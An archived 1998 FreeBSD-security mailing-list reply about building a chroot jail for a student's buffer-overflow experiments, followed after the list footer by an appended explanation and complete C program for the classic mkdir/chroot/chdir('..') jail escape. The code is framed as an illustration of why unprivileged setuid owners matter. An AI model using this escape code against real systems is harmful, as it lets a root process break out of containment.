From owner-freebsd-security Fri Dec 18 09:22:02 1998
Return-Path: <owner-freebsd-security@FreeBSD.ORG>
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA02607 for freebsd-security-outgoing; Fri, 18 Dec 1998 09:22:02 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from dragon.acadiau.ca (dragon.acadiau.ca [131.162.1.79]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA02600; Fri, 18 Dec 1998 09:22:00 -0800 (PST) (envelope-from 026809r@dragon.acadiau.ca)
Received: from dragon (dragon [131.162.1.79]) by dragon.acadiau.ca (8.8.5/8.8.5) with ESMTP id NAA14050; Fri, 18 Dec 1998 13:21:03 -0400 (AST)
Date: Fri, 18 Dec 1998 13:21:03 -0400 (AST)
From: Michael Richards <026809r@acadiau.ca>
X-Sender: 026809r@dragon
To: Marco Molteni
cc: Guido Stepken, freebsd-security@FreeBSD.ORG
Subject: Re: A better explanation (was: buffer overflows and chroot)
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi.

> So my idea/question is: if I build a chroot jail for Bob, fitted with all
> he needs (eg /bin, /usr/bin, /usr/local/bin, /usr/libexec, etc) and I
> replace all the suid root binaries with suid root2 binaries, where root2
> is a normal user, he can do his experiments, but he can't get root.

As I recall, there are a number of ways to escape from a chroot jail. I
think you should be reasonably safe with the standard binaries installed.
You might want to run at a higher securelevel.

If the point here is academic research into an automatic buffer overflow
program, just give him 2 accounts and let him fiddle with exploiting from
one user level to the other via a suid program.

Seeing suid programs core dumping can be an indication that something
funky is going on, but if he gets the overflow right on the first try, of
course it won't core dump :0

-Michael

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
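The "number of ways to escape from a chroot jail" that the reply mentions includes the classic one below. This is an added illustration, not code from the thread or from FreeBSD: chroot() moves the process's root directory but leaves its current working directory alone, so a process that creates a subdirectory, chroot()s into it while its cwd stays at the old jail root, and then walks chdir("..") upward is no longer clamped at the jail and reaches the real filesystem root, where a final chroot(".") makes that its root again. The escape requires the ability to call chroot(), which needs root (on Linux, CAP_SYS_CHROOT), which is exactly why keeping every setuid binary in the jail owned by an unprivileged "root2" matters. The scratch directory name `.escape_dir` and the 256-level walk limit are assumptions of this example.

```c
/*
 * Added example (not from the mailing-list thread): the classic
 * mkdir/chroot/chdir("..") escape from a chroot jail.
 *
 * Only works when the jailed process can call chroot(), i.e. it is root
 * (Linux: CAP_SYS_CHROOT). As an unprivileged user the chroot() call
 * fails with EPERM and the process stays where it is.
 */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 1 if `path` is the top of its namespace (its ".." is itself),
 * 0 if it has a distinct parent, -1 on error. Used to know when the
 * upward walk has reached the real root. */
int is_root_dir(const char *path)
{
    char parent[4096];
    struct stat here, up;

    if (stat(path, &here) != 0)
        return -1;
    if (snprintf(parent, sizeof parent, "%s/..", path) >= (int)sizeof parent)
        return -1;
    if (stat(parent, &up) != 0)
        return -1;
    return (here.st_dev == up.st_dev && here.st_ino == up.st_ino) ? 1 : 0;
}

/* Attempts the escape. Returns 0 on success, -1 (errno set) on failure. */
int break_out_of_chroot(void)
{
    const char *pen = ".escape_dir"; /* hypothetical scratch directory name */
    int depth;

    /* Step 1: a subdirectory below the current directory to chroot() into.
     * An already-existing directory is fine. */
    if (mkdir(pen, 0700) != 0 && errno != EEXIST)
        return -1;

    /* Step 2: move the root *below* our cwd. The cwd itself is not
     * changed by chroot(), so it is now outside the new root and ".."
     * lookups from it are no longer clamped. Fails with EPERM if we are
     * not root. */
    if (chroot(pen) != 0)
        return -1;

    /* Step 3: walk upward until "." has no distinct parent, i.e. we are
     * at the real filesystem root. The bound is an assumption that keeps
     * a misbehaving filesystem from looping forever. */
    for (depth = 0; depth < 256; depth++) {
        int r = is_root_dir(".");
        if (r < 0)
            return -1;
        if (r == 1)
            break;
        if (chdir("..") != 0)
            return -1;
    }

    /* Step 4: make the directory we landed in our root again. */
    return chroot(".");
}

int main(void)
{
    if (break_out_of_chroot() == 0) {
        printf("escaped: root directory is now the real filesystem root\n");
        return 0;
    }
    printf("escape failed: %s (expected for a non-root process)\n",
           strerror(errno));
    return 1;
}
```

Run it as an unprivileged user inside the jail and it fails at step 2, which is the property Marco's design relies on; run it as root inside a plain chroot and it walks out. Note that the setuid-root2 replacement only removes the root-inside-the-jail vector; a higher securelevel, as the reply suggests, addresses different things (immutable files, raw device access) and does not by itself stop this walk if something in the jail does run as root.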